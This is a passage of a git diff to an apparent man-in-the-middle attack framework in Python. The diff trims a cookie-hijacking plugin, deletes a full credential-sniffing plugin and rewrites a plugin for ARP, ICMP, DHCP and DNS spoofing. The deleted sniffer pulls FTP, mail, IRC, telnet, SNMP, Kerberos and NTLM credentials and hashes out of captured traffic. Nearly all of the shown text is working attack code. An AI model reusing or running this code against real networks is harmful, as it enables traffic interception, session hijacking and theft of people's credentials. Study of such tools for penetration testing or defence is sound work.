- # message = "%s Got server cookie: %s" % (request.client.getClientIP(), cookie) - # if self.urlMonitor.isClientLogging() is True: - # self.urlMonitor.writeClientLog(request.client, request.client.headers, message) - # else: - # mitmf_logger.info(message) - - def mallory_server(self): - host = '' - port = 20666 - server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) - server.bind((host,port)) - server.listen(1) - while True: - client, addr = server.accept() - if addr[0] != "127.0.0.1": - client.send("Hacked By China!") - client.close() - continue - request = client.recv(8192) - request = request.split('\n') - path = request[0].split()[1] - client.send("HTTP/1.0 200 OK\r\n") - client.send("Content-Type: text/html\r\n\r\n") - if path == "/": - client.send(json.dumps(self.sessions)) - client.close() - - def firefoxdb(self, host, cookie_name, cookie_value, url, ip): - - session_dir=self.save_dir + "/" + ip - cookie_file=session_dir +'/cookies.sqlite' - cookie_file_exists = os.path.exists(cookie_file) - - if (ip not in (self.sql_conns and os.listdir("./logs"))): - - try: - if not os.path.exists(session_dir): - os.makedirs(session_dir) - - db = sqlite3.connect(cookie_file, isolation_level=None) - self.sql_conns[ip] = db.cursor() - - if not cookie_file_exists: - self.sql_conns[ip].execute("CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path))") - self.sql_conns[ip].execute("CREATE INDEX moz_basedomain ON moz_cookies (baseDomain)") - except Exception, e: - print str(e) - - scheme = urlparse(url).scheme - scheme = (urlparse(url).scheme) - basedomain = self.psl.get_public_suffix(host) - address = urlparse(url).hostname - short_url = scheme + "://"+ address - - log = open(session_dir + '/visited.html','a') - if (ip not in self.seen_hosts): - self.seen_hosts[ip] = {} - log.write(self.html_header) - - if (address not in self.seen_hosts[ip]): - self.seen_hosts[ip][address] = 1 - log.write("\n
\n%s" %(short_url, address)) - - log.close() - - if address == basedomain: - address = "." + address - - expire_date = 2000000000 #Year2033 - now = int(time.time()) - 600 - self.sql_conns[ip].execute('INSERT OR IGNORE INTO moz_cookies (baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly) VALUES (?,?,?,?,?,?,?,?,?,?)', (basedomain,cookie_name,cookie_value,address,'/',expire_date,now,now,0,0)) - - def add_options(self, options): - options.add_argument('--firefox', dest='firefox', action='store_true', default=False, help='Create a firefox profile with captured cookies') - options.add_argument('--mallory', dest='mallory', action='store_true', default=False, help='Send cookies to the Mallory cookie injector browser extension') - - def finish(self): - if self.firefox: - print "\n[*] To load a session run: 'firefox -profile logs//visited.html'" \ No newline at end of file diff --git a/plugins/Sniffer.py b/plugins/Sniffer.py deleted file mode 100644 index ca0ba51..0000000 --- a/plugins/Sniffer.py +++ /dev/null @@ -1,815 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -#This is a MITMf port of net-creds https://github.com/DanMcInerney/net-creds - -from plugins.plugin import Plugin -import logging -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) -from scapy.all import * -from sys import exit -from collections import OrderedDict -from StringIO import StringIO -import binascii -import struct -import pcap -import base64 -import threading -import re -import os - -mitmf_logger = logging.getLogger('mitmf') - -class Sniffer(Plugin): - name = "Sniffer" - optname = "sniffer" - desc = "Sniffs for various protocol login and auth attempts" - tree_output = ["Net-Creds online"] - implements = ["sendRequest"] - version = "0.1" - has_opts = False - - def initialize(self, options): - self.options = options - self.interface = options.interface - #self.parse = options.parse - - #these field names were stolen from the etter.fields file (Ettercap Project) - self.http_userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name', - 'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname', - 'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename', - 'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username', - 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in'] - - self.http_passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword', - 'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password' - 'passwort', 'passwrd', 'wppassword', 'upasswd'] - - if os.geteuid() != 0: 
- sys.exit("[-] Sniffer plugin requires root privileges") - - n = NetCreds() - #if not self.parse: - t = threading.Thread(name="sniffer", target=n.start, args=(self.interface,)) - t.setDaemon(True) - t.start() - - #else: - # pcap = rdpcap(self.parse) - # for pkt in pcap: - # n.pkt_parser(pkt) - - #def add_options(self, options): - # options.add_argument('--parse', dest='parse', type=str, default=None, help='Parse pcap') - - def sendRequest(self, request): - #Capture google searches - if ('google' in request.headers['host']): - if ('search' in request.uri): - self.captureQueries('q', request) - - #Capture bing searches - if ('bing' in request.headers['host']): - if ('Suggestions' in request.uri): - self.captureQueries('qry', request) - - #Capture yahoo searches - if ('search.yahoo' in request.headers['host']): - if ('nresults' in request.uri): - self.captureQueries('command', request) - - self.captureURLCreds(request) - - def captureQueries(self, search_param, request): - try: - for param in request.uri.split('&'): - if param.split('=')[0] == search_param: - query = str(param.split('=')[1]) - if query: - mitmf_logger.info(request.clientInfo + "is querying %s for: %s" % (request.headers['host'], query)) - except Exception, e: - error = str(e) - mitmf_logger.warning(request.clientInfo + "Error parsing search query %s" % error) - - def captureURLCreds(self, request): - ''' - checks for creds passed via GET requests or just in the url - It's surprising to see how many people still do this (please stahp) - ''' - - url = request.uri - - username = None - password = None - for user in self.http_userfields: - #search = re.findall("("+ user +")=([^&|;]*)", request.uri, re.IGNORECASE) - search = re.search('(%s=[^&]+)' % user, url, re.IGNORECASE) - if search: - username = search.group() - - for passw in self.http_passfields: - #search = re.findall("(" + passw + ")=([^&|;]*)", request.uri, re.IGNORECASE) - search = re.search('(%s=[^&]+)' % passw, url, re.IGNORECASE) - if search: - password = search.group() - - if (username and password): - mitmf_logger.warning(request.clientInfo + "Possible Credentials (Method: %s, Host: %s):\n%s" % (request.command, request.headers['host'], url)) - -class NetCreds: - - def __init__(self): - self.pkt_frag_loads = OrderedDict() - self.challenge_acks = OrderedDict() - self.mail_auths = OrderedDict() - self.telnet_stream = OrderedDict() - - # Regexs - self.authenticate_re = '(www-|proxy-)?authenticate' - self.authorization_re = '(www-|proxy-)?authorization' - self.ftp_user_re = r'USER (.+)\r\n' - self.ftp_pw_re = r'PASS (.+)\r\n' - self.irc_user_re = r'NICK (.+?)((\r)?\n|\s)' - self.irc_pw_re = r'NS IDENTIFY (.+)' - self.mail_auth_re = '(\d+ )?(auth|authenticate) (login|plain)' - self.mail_auth_re1 = '(\d+ )?login ' - self.NTLMSSP2_re = 'NTLMSSP\x00\x02\x00\x00\x00.+' - self.NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+' - - def start(self, interface): - try: - sniff(iface=interface, prn=self.pkt_parser, store=0) - except Exception: - pass - - def frag_remover(self, ack, load): - ''' - Keep the FILO OrderedDict of frag loads from getting too large - 3 points of limit: - Number of ip_ports < 50 - Number of acks per ip:port < 25 - Number of chars in load < 5000 - ''' - - # Keep the number of IP:port mappings below 50 - # last=False pops the oldest item rather than the latest - while len(self.pkt_frag_loads) > 50: - self.pkt_frag_loads.popitem(last=False) - - # Loop through a deep copy dict but modify the original dict - copy_pkt_frag_loads = 
copy.deepcopy(self.pkt_frag_loads) - for ip_port in copy_pkt_frag_loads: - if len(copy_pkt_frag_loads[ip_port]) > 0: - # Keep 25 ack:load's per ip:port - while len(copy_pkt_frag_loads[ip_port]) > 25: - self.pkt_frag_loads[ip_port].popitem(last=False) - - # Recopy the new dict to prevent KeyErrors for modifying dict in loop - copy_pkt_frag_loads = copy.deepcopy(self.pkt_frag_loads) - for ip_port in copy_pkt_frag_loads: - # Keep the load less than 75,000 chars - for ack in copy_pkt_frag_loads[ip_port]: - # If load > 5000 chars, just keep the last 200 chars - if len(copy_pkt_frag_loads[ip_port][ack]) > 5000: - self.pkt_frag_loads[ip_port][ack] = self.pkt_frag_loads[ip_port][ack][-200:] - - def frag_joiner(self, ack, src_ip_port, load): - ''' - Keep a store of previous fragments in an OrderedDict named pkt_frag_loads - ''' - for ip_port in self.pkt_frag_loads: - if src_ip_port == ip_port: - if ack in self.pkt_frag_loads[src_ip_port]: - # Make pkt_frag_loads[src_ip_port][ack] = full load - old_load = self.pkt_frag_loads[src_ip_port][ack] - concat_load = old_load + load - return OrderedDict([(ack, concat_load)]) - - return OrderedDict([(ack, load)]) - - def pkt_parser(self, pkt): - ''' - Start parsing packets here - ''' - - if pkt.haslayer(Raw): - load = pkt[Raw].load - - # Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control - if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6): - return - - # UDP - if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw): - - src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport) - dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport) - - # SNMP community strings - if pkt.haslayer(SNMP): - self.parse_snmp(src_ip_port, dst_ip_port, pkt[SNMP]) - return - - # Kerberos over UDP - decoded = self.Decode_Ip_Packet(str(pkt)[14:]) - kerb_hash = self.ParseMSKerbv5UDP(decoded['data'][8:]) - if kerb_hash: - self.printer(src_ip_port, dst_ip_port, kerb_hash) - - # TCP - elif pkt.haslayer(TCP) and pkt.haslayer(Raw): - - ack = str(pkt[TCP].ack) - seq = str(pkt[TCP].seq) - src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport) - dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport) - self.frag_remover(ack, load) - self.pkt_frag_loads[src_ip_port] = self.frag_joiner(ack, src_ip_port, load) - full_load = self.pkt_frag_loads[src_ip_port][ack] - - # Limit the packets we regex to increase efficiency - # 750 is a bit arbitrary but some SMTP auth success pkts - # are 500+ characters - if 0 < len(full_load) < 750: - - # FTP - ftp_creds = self.parse_ftp(full_load, dst_ip_port) - if len(ftp_creds) > 0: - for msg in ftp_creds: - self.printer(src_ip_port, dst_ip_port, msg) - return - - # Mail - mail_creds_found = self.mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq) - - # IRC - irc_creds = self.irc_logins(full_load) - if irc_creds != None: - self.printer(src_ip_port, dst_ip_port, irc_creds) - return - - # Telnet - self.telnet_logins(src_ip_port, dst_ip_port, load, ack, seq) - #if telnet_creds != None: - # printer(src_ip_port, dst_ip_port, telnet_creds) - # return - - # HTTP and other protocols that run on TCP + a raw load - self.other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt) - - def telnet_logins(self, src_ip_port, dst_ip_port, load, ack, seq): - ''' - Catch telnet logins and passwords - ''' - - msg = None - - if src_ip_port in self.telnet_stream: - # Do a utf decode in case the client sends telnet options before their username - # No one 
would care to see that - try: - self.telnet_stream[src_ip_port] += load.decode('utf8') - except UnicodeDecodeError: - pass - - # \r or \r\n terminate commands in telnet if my pcaps are to be believed - if '\r' in self.telnet_stream[src_ip_port] or '\r\n' in self.telnet_stream[src_ip_port]: - telnet_split = self.telnet_stream[src_ip_port].split(' ', 1) - cred_type = telnet_split[0] - value = telnet_split[1].replace('\r\n', '').replace('\r', '') - # Create msg, the return variable - msg = 'Telnet %s: %s' % (cred_type, value) - del self.telnet_stream[src_ip_port] - self.printer(src_ip_port, dst_ip_port, msg) - - # This part relies on the telnet packet ending in - # "login:", "password:", or "username:" and being <750 chars - # Haven't seen any false+ but this is pretty general - # might catch some eventually - # maybe use dissector.py telnet lib? - if len(self.telnet_stream) > 100: - self.telnet_stream.popitem(last=False) - mod_load = load.lower().strip() - if mod_load.endswith('username:') or mod_load.endswith('login:'): - self.telnet_stream[dst_ip_port] = 'username ' - elif mod_load.endswith('password:'): - self.telnet_stream[dst_ip_port] = 'password ' - - def ParseMSKerbv5TCP(self, Data): - ''' - Taken from Pcredz because I didn't want to spend the time doing this myself - I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel? - Maybe replace this eventually with the kerberos python lib - Parses Kerberosv5 hashes from packets - ''' - try: - MsgType = Data[21:22] - EncType = Data[43:44] - MessageType = Data[32:33] - except IndexError: - return - - if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02": - if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33": - HashLen = struct.unpack(' 1: - lines = full_load.count('\r\n') - if lines > 1: - full_load = full_load.split('\r\n')[-2] # -1 is '' - return full_load - - def parse_ftp(self, full_load, dst_ip_port): - ''' - Parse out FTP creds - ''' - print_strs = [] - - # Sometimes FTP packets double up on the authentication lines - # We just want the lastest one. 
Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n" - full_load = self.double_line_checker(full_load, 'USER') - - # FTP and POP potentially use idential client > server auth pkts - ftp_user = re.match(self.ftp_user_re, full_load) - ftp_pass = re.match(self.ftp_pw_re, full_load) - - if ftp_user: - msg1 = 'FTP User: %s' % ftp_user.group(1).strip() - print_strs.append(msg1) - if dst_ip_port[-3:] != ':21': - msg2 = 'Nonstandard FTP port, confirm the service that is running on it' - print_strs.append(msg2) - - elif ftp_pass: - msg1 = 'FTP Pass: %s' % ftp_pass.group(1).strip() - print_strs.append(msg1) - if dst_ip_port[-3:] != ':21': - msg2 = 'Nonstandard FTP port, confirm the service that is running on it' - print_strs.append(msg2) - - return print_strs - - def mail_decode(self, src_ip_port, dst_ip_port, mail_creds): - ''' - Decode base64 mail creds - ''' - try: - decoded = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8') - decoded = decoded.replace('\x00', ' ') - except TypeError: - decoded = None - except UnicodeDecodeError as e: - decoded = None - - if decoded != None: - msg = 'Decoded: %s' % decoded - self.printer(src_ip_port, dst_ip_port, msg) - - def mail_logins(self, full_load, src_ip_port, dst_ip_port, ack, seq): - ''' - Catch IMAP, POP, and SMTP logins - ''' - # Handle the first packet of mail authentication - # if the creds aren't in the first packet, save it in mail_auths - - # mail_auths = 192.168.0.2 : [1st ack, 2nd ack...] - - found = False - - # Sometimes mail packets double up on the authentication lines - # We just want the lastest one. Ex: "1 auth plain\r\n2 auth plain\r\n" - full_load = self.double_line_checker(full_load, 'auth') - - # Client to server 2nd+ pkt - if src_ip_port in self.mail_auths: - if seq in self.mail_auths[src_ip_port][-1]: - stripped = full_load.strip('\r\n') - try: - decoded = base64.b64decode(stripped) - msg = 'Mail authentication: %s' % decoded - self.printer(src_ip_port, dst_ip_port, msg) - except TypeError: - pass - self.mail_auths[src_ip_port].append(ack) - - # Server responses to client - # seq always = last ack of tcp stream - elif dst_ip_port in self.mail_auths: - if seq in self.mail_auths[dst_ip_port][-1]: - # Look for any kind of auth failure or success - a_s = 'Authentication successful' - a_f = 'Authentication failed' - # SMTP auth was successful - if full_load.startswith('235') and 'auth' in full_load.lower(): - # Reversed the dst and src - self.printer(dst_ip_port, src_ip_port, a_s) - found = True - try: - del self.mail_auths[dst_ip_port] - except KeyError: - pass - # SMTP failed - elif full_load.startswith('535 '): - # Reversed the dst and src - self.printer(dst_ip_port, src_ip_port, a_f) - found = True - try: - del self.mail_auths[dst_ip_port] - except KeyError: - pass - # IMAP/POP/SMTP failed - elif ' fail' in full_load.lower(): - # Reversed the dst and src - self.printer(dst_ip_port, src_ip_port, a_f) - found = True - try: - del self.mail_auths[dst_ip_port] - except KeyError: - pass - # IMAP auth success - elif ' OK [' in full_load: - # Reversed the dst and src - self.printer(dst_ip_port, src_ip_port, a_s) - found = True - try: - del self.mail_auths[dst_ip_port] - except KeyError: - pass - - # Pkt was not an auth pass/fail so its just a normal server ack - # that it got the client's first auth pkt - else: - if len(self.mail_auths) > 100: - self.mail_auths.popitem(last=False) - self.mail_auths[dst_ip_port].append(ack) - - # Client to server but it's a new TCP seq - # This handles most POP/IMAP/SMTP logins but there's at least 
one edge case - else: - mail_auth_search = re.match(self.mail_auth_re, full_load, re.IGNORECASE) - if mail_auth_search != None: - auth_msg = full_load - # IMAP uses the number at the beginning - if mail_auth_search.group(1) != None: - auth_msg = auth_msg.split()[1:] - else: - auth_msg = auth_msg.split() - # Check if its a pkt like AUTH PLAIN dvcmQxIQ== - # rather than just an AUTH PLAIN - if len(auth_msg) > 2: - mail_creds = ' '.join(auth_msg[2:]) - msg = 'Mail authentication: %s' % mail_creds - self.printer(src_ip_port, dst_ip_port, msg) - - self.mail_decode(src_ip_port, dst_ip_port, mail_creds) - try: - del self.mail_auths[src_ip_port] - except KeyError: - pass - found = True - - # Mail auth regex was found and src_ip_port is not in mail_auths - # Pkt was just the initial auth cmd, next pkt from client will hold creds - if len(self.mail_auths) > 100: - self.mail_auths.popitem(last=False) - self.mail_auths[src_ip_port] = [ack] - - # At least 1 mail login style doesn't fit in the original regex: - # 1 login "username" "password" - # This also catches FTP authentication! - # 230 Login successful. - elif re.match(self.mail_auth_re1, full_load, re.IGNORECASE) != None: - - # FTP authentication failures trigger this - #if full_load.lower().startswith('530 login'): - # return - - auth_msg = full_load - auth_msg = auth_msg.split() - if 2 < len(auth_msg) < 5: - mail_creds = ' '.join(auth_msg[2:]) - msg = 'Authentication: %s' % mail_creds - self.printer(src_ip_port, dst_ip_port, msg) - self.mail_decode(src_ip_port, dst_ip_port, mail_creds) - found = True - - if found == True: - return True - - def irc_logins(self, full_load): - ''' - Find IRC logins - ''' - user_search = re.match(self.irc_user_re, full_load) - pass_search = re.match(self.irc_pw_re, full_load) - if user_search: - msg = 'IRC nick: %s' % user_search.group(1) - return msg - if pass_search: - msg = 'IRC pass: %s' % pass_search.group(1) - self.printer(src_ip_port, dst_ip_port, msg) - return pass_search - - def headers_to_dict(self, header_lines): - ''' - Convert the list of header lines into a dictionary - ''' - headers = {} - # Incomprehensible list comprehension flattens list of headers - # that are each split at ': ' - # http://stackoverflow.com/a/406296 - headers_list = [x for line in header_lines for x in line.split(': ', 1)] - headers_dict = dict(zip(headers_list[0::2], headers_list[1::2])) - # Make the header key (like "Content-Length") lowercase - for header in headers_dict: - headers[header.lower()] = headers_dict[header] - - return headers - - def parse_http_load(self, full_load, http_methods): - ''' - Split the raw load into list of headers and body string - ''' - try: - headers, body = full_load.split("\r\n\r\n", 1) - except ValueError: - headers = full_load - body = '' - header_lines = headers.split("\r\n") - - # Pkts may just contain hex data and no headers in which case we'll - # still want to parse them for usernames and password - http_line = self.get_http_line(header_lines, http_methods) - if not http_line: - headers = '' - body = full_load - - header_lines = [line for line in header_lines if line != http_line] - - return http_line, header_lines, body - - def get_http_line(self, header_lines, http_methods): - ''' - Get the header with the http command - ''' - for header in header_lines: - for method in http_methods: - # / is the only char I can think of that's in every http_line - # Shortest valid: "GET /", add check for "/"? 
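The headers_to_dict() helper above flattens the header lines with a nested list comprehension, zips the flat list back into key/value pairs, and lowercases the keys. A worked example (the header lines are made up) may make the slicing easier to follow:

```
# Worked example of the headers_to_dict() flattening used by the deleted Sniffer.
header_lines = ['Host: example.com',
                'Content-Length: 42',
                'Authorization: Basic dXNlcjpwYXNz']

headers_list = [x for line in header_lines for x in line.split(': ', 1)]
# -> ['Host', 'example.com', 'Content-Length', '42', 'Authorization', 'Basic dXNlcjpwYXNz']

headers_dict = dict(zip(headers_list[0::2], headers_list[1::2]))
headers = dict((k.lower(), v) for k, v in headers_dict.items())

print headers['authorization']   # Basic dXNlcjpwYXNz
```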
- if header.startswith(method): - http_line = header - return http_line - - - def other_parser(self, src_ip_port, dst_ip_port, full_load, ack, seq, pkt): - - #For now we will parse the HTTP headers through scapy and not through Twisted - #This will have to get changed in the future, seems a bit redundent - http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD '] - http_line, header_lines, body = self.parse_http_load(full_load, http_methods) - headers = self.headers_to_dict(header_lines) - - # Kerberos over TCP - decoded = self.Decode_Ip_Packet(str(pkt)[14:]) - kerb_hash = self.ParseMSKerbv5TCP(decoded['data'][20:]) - if kerb_hash: - self.printer(src_ip_port, dst_ip_port, kerb_hash) - - # Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC,SMBv1/2,LDAP, MSSQL) - NTLMSSP2 = re.search(self.NTLMSSP2_re, full_load, re.DOTALL) - NTLMSSP3 = re.search(self.NTLMSSP3_re, full_load, re.DOTALL) - if NTLMSSP2: - self.parse_ntlm_chal(NTLMSSP2.group(), ack) - if NTLMSSP3: - ntlm_resp_found = self.parse_ntlm_resp(NTLMSSP3.group(), seq) - if ntlm_resp_found != None: - self.printer(src_ip_port, dst_ip_port, ntlm_resp_found) - - # Look for authentication headers - if len(headers) == 0: - authenticate_header = None - authorization_header = None - for header in headers: - authenticate_header = re.match(self.authenticate_re, header) - authorization_header = re.match(self.authorization_re, header) - if authenticate_header or authorization_header: - break - - if authorization_header or authenticate_header: - # NETNTLM - netntlm_found = self.parse_netntlm(authenticate_header, authorization_header, headers, ack, seq) - if netntlm_found != None: - self.printer(src_ip_port, dst_ip_port, netntlm_found) - - def parse_netntlm(self, authenticate_header, authorization_header, headers, ack, seq): - ''' - Parse NTLM hashes out - ''' - # Type 2 challenge from server - if authenticate_header != None: - chal_header = authenticate_header.group() - self.parse_netntlm_chal(headers, chal_header, ack) - - # Type 3 response from client - elif authorization_header != None: - resp_header = authorization_header.group() - msg = self.parse_netntlm_resp_msg(headers, resp_header, seq) - if msg != None: - return msg - - def parse_snmp(self, src_ip_port, dst_ip_port, snmp_layer): - ''' - Parse out the SNMP version and community string - ''' - if type(snmp_layer.community.val) == str: - ver = snmp_layer.version.val - msg = 'SNMPv%d community string: %s' % (ver, snmp_layer.community.val) - self.printer(src_ip_port, dst_ip_port, msg) - return True - - def parse_netntlm_chal(self, headers, chal_header, ack): - ''' - Parse the netntlm server challenge - https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py - ''' - header_val2 = headers[chal_header] - header_val2 = header_val2.split(' ', 1) - # The header value can either start with NTLM or Negotiate - if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate': - msg2 = header_val2[1] - msg2 = base64.decodestring(msg2) - self.parse_ntlm_chal(ack, msg2) - - def parse_ntlm_chal(self, msg2, ack): - ''' - Parse server challenge - ''' - - Signature = msg2[0:8] - msg_type = struct.unpack(" 50: - self.challenge_acks.popitem(last=False) - self.challenge_acks[ack] = ServerChallenge - - def parse_netntlm_resp_msg(self, headers, resp_header, seq): - ''' - Parse the client response to the challenge - ''' - header_val3 = headers[resp_header] - header_val3 = header_val3.split(' ', 1) - - # The header value can either start with NTLM or Negotiate - if 
header_val3[0] == 'NTLM' or header_val3[0] == 'Negotiate': - msg3 = base64.decodestring(header_val3[1]) - return self.parse_ntlm_resp(msg3, seq) - - def parse_ntlm_resp(self, msg3, seq): - ''' - Parse the 3rd msg in NTLM handshake - Thanks to psychomario - ''' - - if seq in self.challenge_acks: - challenge = self.challenge_acks[seq] - else: - challenge = 'CHALLENGE NOT FOUND' - - if len(msg3) > 43: - # Thx to psychomario for below - lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44]) - lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen]) - nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen]) - domain = msg3[domoff:domoff+domlen].replace("\0", "") - user = msg3[useroff:useroff+userlen].replace("\0", "") - # Original check by psychomario, might be incorrect? - #if lmhash != "0"*48: #NTLMv1 - if ntlen == 24: #NTLMv1 - msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge) - return msg - elif ntlen > 60: #NTLMv2 - msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:]) - return msg - - def printer(self, src_ip_port, dst_ip_port, msg): - if dst_ip_port != None: - print_str = '%s --> %s %s' % (src_ip_port, dst_ip_port,msg) - # All credentials will have dst_ip_port, URLs will not - mitmf_logger.info(print_str) - else: - print_str = '%s %s' % (src_ip_port.split(':')[0], msg) - mitmf_logger.info(print_str) diff --git a/plugins/Spoof.py b/plugins/Spoof.py index 0712dc7..148e84c 100644 --- a/plugins/Spoof.py +++ b/plugins/Spoof.py @@ -19,111 +19,122 @@ # import logging -import sys +from sys import exit from core.utils import SystemConfig, IpTables -from core.sslstrip.DnsCache import DnsCache -from core.wrappers.protocols import _ARP, _DHCP, _ICMP +from core.protocols.arp.ARPpoisoner import ARPpoisoner +from core.protocols.arp.ARPWatch import ARPWatch +from core.dnschef.DNSchef import DNSChef +from core.protocols.dhcp.DHCPServer import DHCPServer +from core.protocols.icmp.ICMPpoisoner import ICMPpoisoner from plugins.plugin import Plugin -from core.dnschef.dnschef import DNSChef - -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy from scapy.all import * class Spoof(Plugin): - name = "Spoof" - optname = "spoof" - desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS" - version = "0.6" - has_opts = True + name = "Spoof" + optname = "spoof" + desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS" + tree_output = list() + version = "0.6" + has_opts = True - def initialize(self, options): - '''Called if plugin is enabled, passed the options namespace''' - self.options = options - self.dnscfg = options.configfile['MITMf']['DNS'] - self.dhcpcfg = options.configfile['Spoof']['DHCP'] - self.target = options.target - self.manualiptables = options.manualiptables - self.protocolInstances = [] + def initialize(self, options): + '''Called if plugin is enabled, passed the options namespace''' + self.options = options + self.dnscfg = self.config['MITMf']['DNS'] + self.dhcpcfg = self.config['Spoof']['DHCP'] + self.targets = options.targets + self.manualiptables = options.manualiptables + self.mymac = SystemConfig.getMAC(options.interface) + self.myip = SystemConfig.getIP(options.interface) + self.protocolInstances = [] - #Makes scapy more verbose - debug = False - if options.log_level is 'debug': - debug = True + #Makes scapy more verbose + debug = False + if options.log_level == 'debug': + debug = 
True - if options.arp: + if options.arp: - if not options.gateway: - sys.exit("[-] --arp argument requires --gateway") + if not options.gateway: + exit("[-] --arp argument requires --gateway") - arp = _ARP(options.gateway, options.interface, options.mac_address) - arp.target = options.target - arp.arpmode = options.arpmode - arp.debug = debug + if options.targets is None: + #if were poisoning whole subnet, start ARP-Watch + arpwatch = ARPWatch(options.gateway, self.myip, options.interface) + arpwatch.debug = debug - self.protocolInstances.append(arp) + self.tree_output.append("ARPWatch online") + self.protocolInstances.append(arpwatch) - elif options.icmp: + arp = ARPpoisoner(options.gateway, options.interface, self.mymac, options.targets) + arp.arpmode = options.arpmode + arp.debug = debug - if not options.gateway: - sys.exit("[-] --icmp argument requires --gateway") + self.protocolInstances.append(arp) - if not options.target: - sys.exit("[-] --icmp argument requires --target") - icmp = _ICMP(options.interface, options.target, options.gateway, options.ip_address) - icmp.debug = debug + elif options.icmp: - self.protocolInstances.append(icmp) + if not options.gateway: + exit("[-] --icmp argument requires --gateway") - elif options.dhcp: + if not options.targets: + exit("[-] --icmp argument requires --targets") - if options.target: - sys.exit("[-] --target argument invalid when DCHP spoofing") + icmp = ICMPpoisoner(options.interface, options.targets, options.gateway, options.ip_address) + icmp.debug = debug - dhcp = _DHCP(options.interface, self.dhcpcfg, options.ip_address, options.mac_address) - dhcp.shellshock = options.shellshock - dhcp.debug = debug - self.protocolInstances.append(dhcp) + self.protocolInstances.append(icmp) - if options.dns: + elif options.dhcp: - if not options.manualiptables: - if IpTables.getInstance().dns is False: - IpTables.getInstance().DNS(options.ip_address, self.dnscfg['port']) + if options.targets: + exit("[-] --targets argument invalid when DCHP spoofing") - DNSChef.getInstance().loadRecords(self.dnscfg) + dhcp = DHCPServer(options.interface, self.dhcpcfg, options.ip_address, options.mac_address) + dhcp.shellshock = options.shellshock + dhcp.debug = debug + self.protocolInstances.append(dhcp) - if not options.arp and not options.icmp and not options.dhcp and not options.dns: - sys.exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns") + if options.dns: - SystemConfig.setIpForwarding(1) + if not options.manualiptables: + if IpTables.getInstance().dns is False: + IpTables.getInstance().DNS(self.myip, self.dnscfg['port']) - if not options.manualiptables: - if IpTables.getInstance().http is False: - IpTables.getInstance().HTTP(options.listen) + DNSChef.getInstance().loadRecords(self.dnscfg) - for protocol in self.protocolInstances: - protocol.start() + if not options.arp and not options.icmp and not options.dhcp and not options.dns: + exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns") - def add_options(self, options): - group = options.add_mutually_exclusive_group(required=False) - group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing') - group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects') - group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers') - options.add_argument('--dns', dest='dns', action='store_true', default=False, 
